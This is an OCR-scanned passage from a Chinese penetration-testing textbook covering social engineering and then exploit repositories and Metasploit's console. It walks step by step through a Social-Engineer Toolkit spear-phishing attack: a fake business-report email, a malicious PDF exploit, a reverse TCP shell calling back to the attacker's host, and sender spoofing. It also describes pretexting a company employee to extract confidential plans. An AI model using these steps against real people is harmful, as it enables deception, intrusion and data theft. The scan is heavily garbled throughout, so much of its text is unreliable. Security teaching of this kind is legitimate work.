法 。 社 会 关系 最 易 受 攻击 的 部 分 是 “性 ”。 多 数 情 况 下 ， 异 性 总 是 互相 吸 
引 。 由 于 这 种 强烈 的 感情 和 信任 的 错觉 ， 人 们 可 能 在 不 意 间 同 对 手 透 露 
言 轧 。 很 多 线 上 的 社交 门户 网 站 都 提供 了 见面 和 聊天 的 服务 ， 以 促进 用 
PERES ER. Facebook, MySpace, Twitter, Orkut ”等 网 站 都 是 如 
此 。 例 如 ， XYZ 公 司 聘请 了 Bob， 要 他 获取 ABC 公司 财务 策略 和 市 场 营 
销 战略 以 保持 自身 的 竞争 优势 。 他 首先 查找 对 方 公 司 的 雇员 信息 ， 发 现 
ABC 公司 负责 所 有 业务 运营 的 人 是 一 个 叫 作 Alice 的 女孩 。 因 此 ， 他 假 
闭 是 一 个 普通 的 工商 学 的 研究 生 ， 试 网 与 Alice 取 得 联系 〈 例 如 ， 通 过 
Facebook) . EX, Bob 蓄意 营造 遇见 Alice 的 机 会 ， 共 同 出 席 聚 会 、 
年 庆 活 动 ， 一 同 造访 舞厅 、 首 乐 厢 等 地 方 。 通 过 在 见面 期 间 的 攀谈 ， 
Bob 自 然而 然 地 获取 到 ABC 公 司 有 用 的 财务 和 市 场 策 略 信 息 。 请 记 住 ， 
达成 的 关系 越 有 效 ， 越 信任 ， 就 越 有 利于 社会 工程 学 工程 师 达 到 目标 。 
在 信息 安全 方面 还 有 很 多 简化 这 些 操 作 的 工具 。 下 一 小 节 将 会 介绍 的 
SET 工 具 就 是 典型 的 社会 工程 学 工具 。 
































8.6 Social Engineering Toolkit (SET) 


Social Engineering Toolkit (SET) 是 一 球 先 进 的 多 功能 的 社会 工程 
学 计算 机 辅助 工具 集 。 它 由 TrustedSec Chttps://www.trustedsec.com) 的 
创始 人 编写 ， 可 以 行 之 有 效 地 利用 客户 端 应 用 程序 的 漏洞 获取 目标 的 机 
恩 〈 例 如 E-mail 密码 ) 。SET 可 实现 多 种 非常 有 效 且 实用 的 攻击 方法 。 
其 中 ， 人 们 第 用 的 方法 有 : 用 恶意 附件 对 目标 进行 E-mail 钓 鱼 攻 击 、 
Java applet 攻击 、 基 于 浏览 堪 的 漏洞 攻击 、 收 集 网 站 认证 信息 、 建 立 感 
染 的 便携 媒体 CUSB/DVD/CDO 、 邮 件 群 发 攻击 及 其 他 类 似 攻击 。 它 是 
实现 这 些 攻 击 方法 的 合成 攻击 平台 。 充 分 利用 这 个 程序 的 极 具 说 服 力 的 
技术 ， 可 对 人 的 因素 进行 深入 测试 。 

如 需 局 动 SET， 可 在 条 面 染 单 中 依次 选中 Applications | Kali Linux | 
Exploitation Tools | Social Engineering Toolkit | setoolkit. 

或 者 在 终端 中 加 载 SET 程 序 。 

root@kali: ~# setoolkit 

上 述 指令 将 显示 如 下 选项 〈 见 图 8.1) 。 

本 例 将 演示 通过 恶意 PDF 附 件 发 起 钓鱼 攻击 的 方法 。 在 收 件 人 打开 
附件 时 ， 他 们 的 主机 将 被 攻陷 。 

不 要 使 用 SET 工具 集 自 带 的 更 新 功能 更 新 SET 程序 包 。 您 应 该 使 用 
Kali Linux 系统 的 更 新 功能 ， 以 获取 SET 软件 的 更 新 。 
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IS on irc.freenode.net it 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: 

Select from the menu: 

1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 

5) Update the Social-Engineer Toolkit 


6) Update SET configuration 
7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 





图 8.1 


如 果 采 用 这 种 攻击 方法 ， 我 们 就 要 首先 创建 一 个 配合 恶意 PDF 附 件 
的 E-mail 模板 ， 再 选择 适当 的 PDF exploit payload， 然 后 设置 攻击 平台 与 
目标 主机 之 间 的 连接 关系 ， 最 后 通过 Gmail 向 目标 发 送 这 封 E-mail。 需 
要 注意 的 是 ， 您 可 以 通过 Kali Linux 自 带 的 sendmail 程 序 伪造 原始 发 件 人 
的 E-mail 地 址 和 IP 地 址 。Sendmail 的 配置 文件 
是 /usr/share/set/config/set_config。 有 关 程 序 的 详细 信息 ， 请 参考 Social 
Engineer Toolkit (SET) 的 官方 说 明 : http:/www.social- 


engineer.org/framework/Social_Engineering_Framework. 


这 种 攻击 方法 的 具体 步骤 如 下 。 








1. 在 SET 程序 的 最 初 豆单 里 选择 1， 进 入 图 8.2 所 示 的 设置 界面 。 

2. 我 们 选择 1， 即 Spear-fishing Attack Vectors， 然 后 进入 图 8.3 所 示 
的 设置 界面 。 

3. 在 上 述 选 项 中 ， 我 们 必须 选择 3， 创 建 社 会 工程 学 邮件 的 模板 。 
然后 ， 我 们 书写 邮件 正文 ， 如 图 8.4 所 示 。 


Select from the menu: 


1) Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
SMS Spoofing Attack Vector 


Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


Return back to the main menu. 





set» 1 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=0 
F 
flag to SENDMAIL=ON. 


There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 


1) Perform a Mass Email Attack 
2) Create a FileFormat Payload 
3) Create a Social-Engineering Template 


99) Return to Main Menu 








set :phishing»l 


图 8.3 





set :phishing>3 
[****] Custom Template Generator [****] 





Always looking for new templates! In the set/src/templates directory send an ema 
il 
to davek@secmaniac.com if you got a good template! 
set> Enter the name of the author: Steven 
set» Enter the subject of the email: XYZ Inc Business Report 
rol«c when finished: : Dear User,e, hit return for a new line. Contr 
Next line of the body: Please find the attached document for XYZ Company 
Next line of the body: Regards, 
Next line of the body: Steven 
Next line of the body: 








图 8.4 
4. 虽然 我 们 在 上 一 步 里 写 好 了 邮件 的 正文 ， 但 是 并 没有 设置 邮件 的 
格式 。 模 板 生 成 程序 会 把 您 编辑 的 内 容 当 作 模 板 的 一 部 分 套用 格式 模 





板 。 在 编辑 完 正 文 之 后 ， 使 用 Ctrl+C 键 返回 上 级 菜单 。 然 后 ， 进 行 E- 
mail 攻 击 的 有 关 设 置 。 我 们 从 Perform a Mass Email Attack % E 36 f£1, 
再 选择 6， 即 Adobe CoolType SING Table“uniqueName”Overflow 选 项 ， 
如 图 8.5 所 示 。 





set :phishing»l 


Select the file format exploit you want. 
The default is the PDF embedded EXE. 


A oc EE i ok iE oe PAYLOADS EO OO te note 


1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 

2) SET Custom Written Document UNC LM SMB Capture Attack 

3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RIF pFragments Stack Buffer Overflow (MS10-087) 
5) Adobe Flash Player "Button" Remote Code Execution 

6) Adobe CoolType SING Table "uniqueName" Overflow 

7) Adobe Flash Player "newfunction" Invalid Pointer Use 

8) Adobe Collab.collectEmailInfo Buffer Overflow 

9) Adobe Collab.getIcon Buffer Overflow 

10) Adobe JBIG2Decode Memory Corruption Exploit 

11) Adobe PDF Embedded EXE Social Engineering 

12) Adobe util.printf() Buffer Overflow 

13) Custom EXE to VBA (sent via RAR) (RAR required) 

14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 

15) Adobe PDF Embedded EXE Social Engineering (NOJS) 

16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 

17) Apple QuickTime PICT PnSize Buffer Overflow 

18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 

19) Adobe Reader u3D Memory Corruption Vulnerability 
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027) 





bet :payloads»l 








图 8.5 

5. 接 下 来 设置 payload 类 型 。 本 例 应 该 选择 6， 即 Windows reverse 
TCP shell。 然 后 设置 目标 主机 应 当 连 接 到 的 攻击 平台 (通常 是 Kali 
Linux AL) WIP 和 端口 。 本 例假 设 攻击 平台 的 IP 地 址 是 192.168.1.1， 
服务 端口 是 5555。 我 们 进行 相应 设置 ， 如 图 8.6 所 示 。 

6. 然后 我 们 更 改 文件 名 ， 以 使 文件 名 称 引 人 人 注目。 我 们 把 payload 
的 文件 名 改 成 了 BizRep2010.pdf。 然 后 ， 我 们 要 让 SET 知道 它 要 如 何 处 
理 我 们 的 payload。 我 们 选择 1, HÉA E-mail 地 址 发 送 payload; 然后 
再 选择 1， 使 用 先前 编辑 好 的 邮件 模板 。 现 在 ， 您 的 屏幕 大 体会 是 图 8.7 
所 示 的 这 种 情况 。 








jset :payloads»l 

set» IP address for the payload listener: 192.168.1.1 
set:payloads» Port to connect back on [443]:5555 

[-] Generating fileformat exploit... 

[*] Payload creation complete. 

[*] Al payloads get sent to the /root/.set/template.pdf directory 

[-] As an added bonus, use the file-format creator in SET to create your attachment. 
Right now the attachment will be imported with filename of 'template.whatever' 


Do you want to rename the file? 
example Enter the new filename: moo.pdf 


1. Keep the filename, I don't care. 
2. Rename the file, I want to be cool. 





set :phishing 


图 8.6 





What do you want to do: 


1. E-Mail Attack Single Email Address 
2. E-Mail Attack Mass Mailer 


99. Return to main menu. 
set :phishing»l 


Do you want to use a predefined template or craft 
a one time email template. 


1. Pre-Defined Template 
2. One-Time Use Email Template 


set :phishing»l 

[-] Available templates: 

1: WOAAAA! ! ! ! ! Ó! Ó!ÓÓIHÜIUÜ! This is crazy. 
2: Order Confirmation 

3: New Update 

4: Status Report 

5: How long has it been? 

6: Computer Issue 

7: Baby Pics 

8: Have you seen this? 

9: Strange internet usage from your computer 


10: Dan Brown's Angels & Demons 
11: XYZ Inc Business Report 
set :phishing»Bi 








图 8.7 
7. 接 下 来 ， 我 们 选择 先前 创建 的 E-mail 模板 (11) 。 这 样 ，SET 
将 在 后 续 的 社会 工程 学 攻击 里 重复 利用 这 个 模板 。 您 创建 的 模板 的 质 
量 ， 很 大 程度 上 决定 了 钓鱼 战役 的 实际 效果 。 然 后 ， 我 们 使 用 有 效 的 E- 
mail 中 转 服务 器 或 Gmail 账 户 同 目标 人 员 发 送 攻 击 性 E-mail。 


只 有 在 测试 条 球 里 存在 相应 测试 内 容 且 客户 明确 理解 测试 内 容 的 情 
况 下 ， 您 才 可 以 进行 这 种 攻击 测试 。SET 工 具 把 感染 文件 发 送 给 E-mail 
收 件 人 ， 这 种 行为 可 能 会 引发 法 律 问题 。 您 需要 参照 发 起 测试 地 区 的 当 
地 法 律 文件 了 解 有 关 的 法 律 规定 。 一 旦 您 在 SET 中 设置 了 E-mail 信息 ， 
它 就 会 立即 建立 连接 发 送 文 件 。 程 序 会 在 没有 任何 警告 或 提示 的 情况 下 
直接 发 送 E-mail。 

8. 至 此 ， 我 们 已 经 向 目标 发 起 了 攻击 。 现 在 我 们 等 待 受害 人 打开 我 
们 的 恶意 PDF 文件 。 在 他 /她 打开 PDF 附 件 的 时 候 ， 我 们 将 通过 反射 shell 
连接 到 被 害 人 电脑 的 shell。 请 注意 ， 我 们 配置 的 IP 地 址 192.168.1.1 是 
攻击 人 员 主 机 的 IP 地 址 〈 也 就 是 Steven 电 脑 的 了 P) ， 它 在 5555 端 口 受理 
被 害 人 电脑 反射 shell 返 回 的 连接 。 

通过 上 述 步 又 ， 我 们 就 完成 了 向 目标 发 起 社会 工程 学 攻击 的 操作 ， 
并 可 远程 访问 被 害 人 的 主机 。 我 们 可 在 shell 的 交互 式 提示 符 下 执行 
Windows 命 令 。 

SET 可 同时 对 一 人 或 多 人 进行 电子 邮件 的 钓鱼 攻击 。 它 整合 了 可 定 
TB E-mail 功能 ， 便 于 社会 工程 学 工程 师 制定 安全 的 攻击 路 线 。 这 种 
功能 可 在 攻击 多 个 公司 员工 的 同时 保持 攻击 的 隐蔽 性 。 

SET 的 作者 不 断 地 更 新 着 这 个 程序 ， 以 适应 当前 技术 的 剧烈 变化 。 
不 过 ， 它 的 功能 可 见 一 斑 。 本 书 强 烈 建议 读者 访问 作者 的 网 站 ， 继 续 领 
i SET 的 风采 。 它 的 官方 网 站 是 


https://www.trustedsec.com/downloads/social- engineer-toolkit/。 











8.7 本 童 总 结 





在 本 章 中 ， 我 们 阐述 了 社会 工程 学 在 生活 中 各 领域 的 第 见 用 法 。 渗 
透 测试 人 员 可 以 根据 实际 情况 采取 相应 的 社会 工程 学 策略， 获取 目 标的 
敏感 信息 。 人 性 本 里 非常 容易 受到 这 种 拉 术 的 欺骗 攻击 。 为 了 全 面 介绍 











社会 工程 学 的 技巧 ， 本 文 讨论 了 构成 人 类 心理 学 模型 的 几 个 因素 ， 这 些 
因素 包括 沟通 、 环 境 、 知 识 和 沟通 模式 控制 。 这 些 心理 学 原则 可 玫 助 攻 
击 人 员 根 据 被 测 目 标的 实际 情况 ， 拟 定 适 用 的 攻击 过 程 〈 情 报 收集 、 确 
定 漏洞 点 、 规 划 攻 击 和 执行 攻击 ) 和 攻击 方法 〈 冒 名 顶 蔡 、 投 桃 报 李 、 
狐 假 虎威 、 唉 以 重 利 和 社会 关系 ) 。 随 后 ， 我 们 演示 了 SET 的 使 用 方 
法 ， 它 具有 在 线 进 行 目 动 化 社会 工程 学 攻击 的 强大 功能 。 





漏洞 利用 是 渗透 测试 的 一 个 环节 。 脆 弱 性 评估 不 涉及 漏洞 利用 的 有 
关 测 试 。 在 摸索 出 目标 的 漏洞 之 后 ， 测 试 人 员 会 验证 并 真 刀 真 枪 地 利用 
目标 系统 的 安全 漏洞 ， 以 进一步 了 解 目 标 网 络 和 运营 系统 ， 获 取 更 多 信 
恩 ， 甚 至 掌握 完全 控制 权 。 本 章 讲 重点 介绍 实战 环境 下 使 用 的 漏洞 利用 
工具 ， 并 阐述 漏洞 利用 的 具体 方法 。 

本 章 分 为 以 下 几 个 部 分 。 

9.1 节 介绍 漏洞 检测 的 相关 知识 。 漏 洞 检测 是 理解 、 检 查 、 测 试 漏 
洞 的 基础 工作 ， 是 指导 利用 漏洞 工作 的 重要 环节 。 

9.2 节 介 绍 漏洞 和 漏洞 利用 程序 的 资料 库 〈exploit repositories) 。 漏 
洞 利用 程序 的 资料 库 是 查找 公开 获取 exploit 的 重要 途径 ， 它 还 描述 了 有 
关 exploit 的 应 用 方法 。 

9.3 节 从 评估 目标 安全 性 的 角度 ， 讲 解 一 天 恶名 远扬 的 漏洞 利用 程 
序 工 具 集 及 其 使 用 方法 。 这 部 分 内 容 清晰 地 演示 了 利用 目标 漏洞 到 获取 
敏感 信息 的 各 个 步骤 。 本 节 还 进行 了 细致 的 案例 说 明 。 

本 章 的 最 后 篇 幅 将 简要 地 介绍 编写 Metasploit exploit 模板 的 具体 步 




















编写 漏洞 利用 程序 CexploiO 的 程序 代码 都 不 仅 费 时 费力 ， 而 且 代 
码 的 质量 直接 关系 着 整个 工作 环节 的 成 改 。 因 此 ， 渗 透 人 员 需 要 根据 目 
标 环境 的 实际 情况 对 通过 公开 渠道 获取 的 exploit 程 序 进行 相应 调整 。 这 
种 调整 工作 的 技术 含量 很 高 ， 而 且 这 类 工作 通常 都 是 触 类 劳 通 的 。 和 掌握 
相应 技能 的 人 员 可 以 举一反三 地 对 很 多 程序 进行 调整 。 强 烈 建议 读者 在 
编写 自己 的 漏洞 利用 程序 之 前 ， 先 通过 公开 渠道 获取 的 的 漏洞 利用 程序 
练 手 。 























了 解 特定 软件 或 特定 硬件 设备 的 功能 ， 可 能 就 是 挖掘 其 潜在 漏洞 的 
第 一 步 。 检 验 漏洞 并 不 容易 ， 绝 非 是 一 路 而 就 之 事 。 检 验 人 员 必 须 具 备 
扎实 的 知识 基础 ， 了 解 安 全 分 析 的 各 方面 因素 。 漏 洞 检测 所 需 的 安全 分 
析 技 能 分 为 以 下 几 种 。 

e 编程 技能 : 这 是 称职 的 守法 黑客 必须 具备 的 基础 素质 。 掌 握 茶 种 
编程 语言 的 基本 原理 和 编程 方法 ， 是 安全 测试 人 员 检 测 程序 漏洞 的 必 备 
技能 。 除 此 之 外 ， 他 还 应 当 深 入 了 解 处 理 器 、 系 统 内 存 、 绥 冲 区 、 指 
针 、 数 据 类 型 、 寄 存 器 和 缓存 等 基础 概念 。 无 论 是 CC++、Python、Pert 
还 是 汇编 语言 ， 几 乎 所 有 编程 语言 的 实现 方式 都 与 上 述 概念 有 关 。 根 据 
现 有 漏洞 编写 exploit 程 序 的 基本 方法 ， 请 参 疯 http:/www. 


phreedom.org/presentations/exploit-code-development/exploit-code- 




















development.pdf. 

e 逆 同 工程 : 漏洞 挖掘 工作 同样 依赖 测试 人 员 的 逆向 工程 技能 。 这 
种 技术 分 析 程 序 的 具体 函数 、 数 据 结构 和 算法 ， 可 检测 出 电子 设备 、 软 
件 以 及 系统 中 潜藏 的 漏洞 。 逆 回 工程 的 反 编译 技术 ， 可 在 事先 不 知道 内 
部 结构 情况 下 逆 同 解析 出 程序 的 源 代码 ， 从 而 测试 程序 的 错误 条 件 、 不 
完善 的 函数 以 及 存在 缺陷 的 协议 ， 并 能 够 测试 程序 的 边界 条 件 。 专 业 的 
安全 研究 员 都 具备 很 高 的 逆 癌 工程 实战 能 力 。 逆 癌 工 程 可 以 用 于 去 除 软 
件 的 版 权 保护 、 安 全 审计 、 分 析 技 术 苋 争 情报 、 侵 权 鉴 定 、 研 究 软 件 的 
交互 性 、 午 握 程 序 的 工作 机 制 ， 甚 至 破获 敏感 数据 。 逆 回 工程 为 应 用 安 
全 的 概念 增加 了 两 个 抽象 层 : 源 代码 级 审计 Csource code auditing) 和 
二 进 制 〈 可 执行 程序 ) 审计 (binary auditing) 。 如 果 可 以 获取 程序 的 源 
代码 ， 审 计 人 员 可 采用 自动 或 手动 的 方式 分 析 源 程序 的 安全 问题 ， 进 而 
解析 出 可 能 触发 漏洞 的 边界 条 件 。 男 一 方面 ， 虽 然 测 试 人 员 可 以 在 没有 
源码 的 情况 下 进行 二 进 制 审计 ， 不 过 这 种 审计 的 效果 不 如 源 代码 审计 理 




















想 。 二 进 制 审计 通常 都 会 用 到 两 种 通用 类 型 的 辅助 工具 ， 即 反 汇 编程 序 
(disassemblers) 和 反 编 诺 程 序 Cdecompilers) 。 反 汇编 程序 可 把 编译 
后 的 二 进 制 程序 反 汇 编 成 汇编 指令 ， 而 反 编 译 右 则 把 编译 后 的 二 进 制程 
序 反 编译 成 高 级 程序 语言 的 程序 源 代 码 。 然 而 ， 无 论 选用 反 汇 编程 序 还 
是 有 反 编译 程序 ， 成 功 的 逆向 安全 工作 都 离 不 开 审计 人 员 扎 实 的 技术 实力 
TUO ETA PE ATH AS FE e 
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模糊 测试 数据 生成 器 、 事 件 检测 器 、 代 码 履 盖 分 析 器 、 流 量 分 析 器 和 内 
存 监 视 占 。 对 于 检验 漏洞 的 工作 来 次 ， 漏 洞 检 测 工 具 十 分 重要 。 它 们 同 
时 还 是 测试 项 目的 集成 测试 平台 。 虽 然 Kali Linux 收 录 了 不 少 监测 工 
具 ， 但 是 本 书 并 不 会 详细 讲解 每 款 工 具 。 如 需 持续 关注 逆向 工具 的 最 新 
动态 ， 请 访问 在 线 的 网 络 资料 库 : 
http://www.woodmann.com/collaborative/tools/index.php/Category 
RCE Tools. 

e 构建 exploit 和 payload 的 技术 实力 : FFA HR E] Jes — 27 LP SALA 
编写 漏洞 的 PoC (Proof of Concept， 概 念 验证 ) 程序 ， 即 shellcode。 这 
种 程序 旨 在 使 渗透 测试 人 员 在 远程 目标 主机 上 执行 目 定 义 的 指令 。 根 据 
逆 同 工程 阶段 掌握 的 应 用 程序 的 具体 缺陷 ， 测 试 人 员 要 编写 验证 漏洞 的 
点 睛 之 笔 一 一 shellcode 程 序 。 同 时 ， 他 们 还 要 防止 shellcode 存 在 缺陷 ， 
尽 其 所 能 地 避免 exploit〈 漏 洞 利用 程序 ) 出 现 骨 省 问 题 。 

要 让 目标 系统 执行 我 们 编写 的 程序 或 我 们 所 要 执行 的 指令 ， 就 应 当 
针对 漏洞 的 类 型 和 类 别 拟定 针对 性 的 策略 。 为 了 获取 目标 操作 系统 的 控 
制 权 ， 专 业 的 渗透 测试 人 员 会 尽力 挖掘 并 综合 使 用 应 用 程序 的 各 种 安全 
缺陷 。 本 章 的 后 半 部 分 将 通过 几 个 场景 演示 ”Metasploit 框 架 的 使 用 方法 
和 相关 技术 。 









































近 些 年 来 ， 公 共 领 域 持续 报道 了 大 量 的 程序 漏洞 。 其 中 一 些 漏洞 存 
在 PoC. PoC 程序 从 一 个 侧面 验证 了 exploit〈 利 用 应 用 程序 漏洞 ) 的 可 
行 性 。 而 且 ， 并 不 是 每 个 被 发 现 的 漏洞 都 会 被 立刻 修补 。 在 当今 这 个 时 
代 里 ， 人 们 争先 候 后 地 获取 exploit 信 息 和 漏洞 信息 。 渗 透 测 试 人 员 同 样 
可 以 通过 公开 渠道 快速 地 检索 可 适用 于 目标 系统 的 exploit 程 序 。 如 果 具 
备 了 一 定 的 编程 技巧 并 掌握 解 操 作 系 统 的 具体 架构 ， 您 还 可 以 将 一 种 类 
型 的 exploit 转 换 为 另 一 种 exploit《〈 例 如 ， 将 Win32 框 架 的 exploit 转 换 为 
Linux 架 构 的 exploit 程 序 ) 。 本 文 将 介绍 一 系列 的 网 络 资料 库 ， 以 助 您 奶 
踩 漏 洞 信息 或 查找 适用 的 exploit 程 序 。 

请 注意 : 网 络 上 公开 的 漏洞 信息 并 不 涵盖 全 部 已 知 漏洞 。 此 外 ， 虽 
然 部 分 漏洞 存在 对 应 的 PoC exploit 程 序 ， 但 是 并 非 所 有 的 安全 漏洞 信息 
都 有 公开 的 PoC 人 代码。 在 公开 的 漏洞 信息 中 ， 部 分 漏洞 的 描述 信息 甚至 
可 谓 是 言 之 无 物 。 因 此 ,“ 要 在 研究 漏洞 时 参考 多 个 网 上 资源 ”已 经 成 为 
了 众多 安全 审计 人 员 的 共识 。 


资料 库 名 称 
Bugtraq SecurityFocus 
OSVDB Vulnerabilities 
Packet Storm 
VUPEN Security 
National Vulnerability Database 
ISS X-Force 
US-CERT Vulnerability Notes 
US-CERT Alerts 
SecuriTeam 
Government Security Org 
Secunia Advisories 
Security Reason 
XSSed XSS-Vulnerabilities 
Security Vulnerabilities Database 
SEBUG 
BugReport 
MediaService Lab 
Intelligent Exploit Aggregation Network 
HackOwn 


本 文 仅 罗 列 了 部 分 网 络 资源 。Kali Linux 集 成 了 由 “Offensive 
Security” 提 供 的 资料 库 ， 可 在 您 的 系统 上 保存 exploit 的 所 有 漏洞 记录 ， 
以 便 您 日 后 参考 和 使 用 。 如 需 查 看 Exploit-DB 提 供 的 资料 ， 可 在 主机 的 








网 址 


http://www.securityfocus.com 
http://osvdb.org 
http://www.packetstormsecurity.org 
http: //www.vupen.com 
http://nvd.nist.gov 
http://xforce.iss.net 
http://www.kb.cert.org/vuls 
http://www.us-cert.gov/cas/techalerts/ 
http://www.securiteam.com 
http://www.governmentsecurity.org 
http://secunia.com/advisories/historic/ 
http://securityreason.com 
http://www.xssed.com 
http://securityvulns.com 
http://www.sebug.net 
http://www.bugreport.ir 
http://lab.mediaservice.net 
http://www.intelligentexploit.com 
http://www. hackOwn.com 








shell 中 执行 下 述 指令 

# cd /usr/share/exploitdb/ 

# vim files.csv 

中 令 将 列 出 Exploit-DB 收 录 的 所 有 exploit 信 息 ， 即 本 

机 /usrshare/exploitdb/platforms/ 目 录 下 的 文件 清单 和 相关 描述 。Kali 以 
目标 系统 的 类 型 对 漏洞 进行 分 类 CWindow. Linux. HP-UX, Novell. 
Solaris, BSD, IRIX, TRU64. ASP, PHP 等 ) ， 并 把 各 种 exploit 的 源 
代码 保存 在 相应 的 子 目 录 下 。 这 些 文件 多 数 是 C、Perl、Python、 
Ruby、PHP 以 及 其 他 一 些 编程 技术 开发 的 exploit WRI. Kali Linux 已 
经 收录 了 执行 exploit 程序 所 需 的 编译 程序 和 解释 程序 。 

如 何 从 exploits 信 息 叶 od aes 

通过 操作 系统 的 Bash ”指令 ， 您 可 以 对 文本 文件 的 输出 内 容 进 行 过 
滤 ， 从 而 筛选 所 需 信 息 。 您 可 以 通过 searchsploit 指令， 或 者 是 cat 
files.csv | cut -d“,”-f3 指 令 检 索 特 定 的 exploit。 有 关 shell 指 令 的 基本 用 
法 ， 请 查阅 http://tldp.org/LDP/abs/html/index.html。 












































Kali Linux 预 装 了 几 款 十 分 好 用 的 高 级 漏洞 利用 程序 工具 集 ， 其 中 
RE 框架 Chttp://www.metasploit.com) 。 本 文 将 不 仅 会 详细 
地 介绍 这 球 工 具 ， 而 且 还 会 通过 大 量 行 之 有 效 的 应 用 场景 来 演示 它 的 使 
用 方法 ， 以 加 深 读 者 对 渗透 测试 的 认识 。Metasploit 框架 是 由 Ruby 程 序 
语言 编写 的 模板 化 框架 ， 上 有 具有 很 好 的 扩展 性 ， 便 于 渗透 测试 人 员 开 发 、 
使 用 定制 的 工具 模板 。Metasploit 的 框架 可 以 分 为 三 大 类 组 成 部 分 : 
库 、 界 面 和 模板 。 本 文章 点 关注 各 个 界面 和 模板 的 功能 。 界 面 〈 控 制 
ft. CU. Web. GUI) 基本 上 是 调用 功能 模板 (漏洞 利用 、 有 效 载 答 、 
辅助 工具 、 加 密 引 擎 、NOP) 的 前 端 UI。Metasploit 框 架 的 每 个 模板 都 











有 不 同 的 作用 ， 它 们 大 体 可 分 为 下 述 模 块 。 

e exploit 〈 漏 洞 利用 程序 模板 ) : 包含 各 种 PoC 验证 程序 ， 用 于 验 
证 利用 特定 漏洞 〈exploit) 的 可 行 性 。 

e payload (ATH) : 包含 各 种 恶意 程序 ， 用 于 在 目标 系统 
上 运行 任意 命令 。 它 可 能 是 exploit 的 一 部 分 ， 也 可 能 是 独立 编译 的 应 用 
RE. 

e Auxiliaries 〈 辅 助 工 具 模板 ) : 包含 一 系列 扫描 、 嗅 探 、 拨 号 测 
试 、 指 纹 识别 和 其 他 类 型 的 安全 评估 程序 。 

e Encoders (编码 工具 模板 ): 在 渗透 测试 中 ， 这 个 模板 用 来 加 密 
有 效 载荷 ， 以 避免 被 杀毒 软件 、 防 火场 、IDSAPS 以 其 他 类 似 的 反 恶 意 
软件 检测 出 来 。 

e NOP〔 空 操作 模板 〉: 这 个 模板 用 于 在 shellcode 中 插入 NOP ( 汇 
编 指 令 ) 。 虽 然 NOP 不 会 进行 实际 的 操作 ， 但 是 在 构造 shellcode 时 可 以 
用 来 暂时 将 代 playload， 形 成 完整 的 shellcode 程 序 。 

为 了 便于 读者 理解 ， 下 文 将 演示 两 个 著名 的 Metasploit 界 面 ， 并 讲 
解 相 关 的 指令 行 选项 。 每 个 接口 都 有 各 自 的 各 有 长 处 和 短处 。 本 文 强烈 
建议 读者 习惯 使 用 console 接 口 ， 因 为 它 支 持 该 框架 的 多 数 功 能 。 


9.3.1 MSFConsole 


MSFConsole 是 效率 最 高 、 功 能 最 强大 的 高 度 集成 的 端 界面 之 一 。 
它 便于 渗透 测试 人 员 充 分 利用 整个 漏洞 利用 程序 框架 。 如 需 使 用 
msfconsole ， 可 在 架 面 沫 单 里 依次 选中 Applications | Kali Linux | 
Exploitation Tools | Metasploit | metasploit framework， 或 在 终端 中 执行 下 
述 指令 。 

# msfconsole 

上 述 指令 将 用 户 带 入 控制 台 类 型 的 人 机 交互 界面 。 如 有 果 需 要 了 解 所 
有 可 用 的 命令 ， 可 以 输 人 下 述 指令 。 








msf > help 

上 述 指 令 将 会 显示 两 类 命令 。 一 类 指令 是 在 整个 框架 内 通用 的 常规 
指令 ， 男 一 类 指令 则 是 面向 后 台数 据 库 的 专用 指令 。 后 台数 据 库 里 存储 
着 评估 参数 和 评估 结果 。 要 想 人 查看 某 个 指令 的 选项 说 明 ， 可 以 在 有 关 指 
令 的 后 面 添加 -h 后 绥 。 例 如 ， 我 们 可 通过 下 述 指令 和 查看 show 命 令 的 使 用 
说 明 。 


msf > show -h 








[*] Valid parameters for the "show" command are: all, encoders, nos, 
exploits, payloads, auxiliary, plugins, options 

[*] Additional module-specific parameters are: advanced, evasion, 
targets, actions 

上 述 命令 通常 用 于 显示 某 个 类 型 的 可 用 模板 ， 或 者 显示 所 有 模板 。 
常用 的 指令 如 下 所 示 。 

e show auxiliary: 列 出 全 部 的 辅助 工具 模板 。 

e show exploits: 列 出 框架 下 所 有 的 漏洞 利用 程序 。 

e show payloads: 列 出 所 有 平台 下 的 有 效 载荷 。 如 果 已 经 选 定 了 一 
个 漏洞 利用 程序 ， 再 使 用 该 命令 就 只 会 显示 相关 的 载荷 。 例 如 ， 
WindowsH'] Zn] T4 3 zi--3 Windows 相 关 的 漏洞 利用 模板 。 

e show encoders: 显示 可 用 的 编码 工具 模板 。 

e show nops: 显示 所 有 可 用 的 NOP 生成 程序 。 

e show options: 显示 指定 模板 的 全 部 设置 和 选项 信息 。 

e show targets: 显示 exploit 文 持 的 操作 系统 类 型 。 

e show advanced: 列 出 所 有 高 级 配置 选项 ， 以 便 进 行 微调 。 

我 们 将 最 具 价 值 的 几 个 常用 命令 总 结 为 下 述 表 格 。 您 可 以 在 
Metasploit ”的 控制 台 Cconsole) 中 进行 上 机 练习 。 指 令 中 的 斜体 字 部 
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分 ， 是 您 来 指定 的 参数 。 








i e 


fü 述 








Check 


connect ip port 
exploit 
run 
jobs 


route add subnet 
netmask sessionid 


info module 


在 不 利用 漏洞 的 前 提 下 ， 检 测 目标 主机 是 否 存 在 特定 漏洞 。 不 过 ， 多 数 exploit 不 支持 
该 指令 

Netcat 和 Telnet 这 类 连接 工具 的 指令 

执行 用 户 指定 的 exploit 

执行 用 户 指定 的 auxiliary 

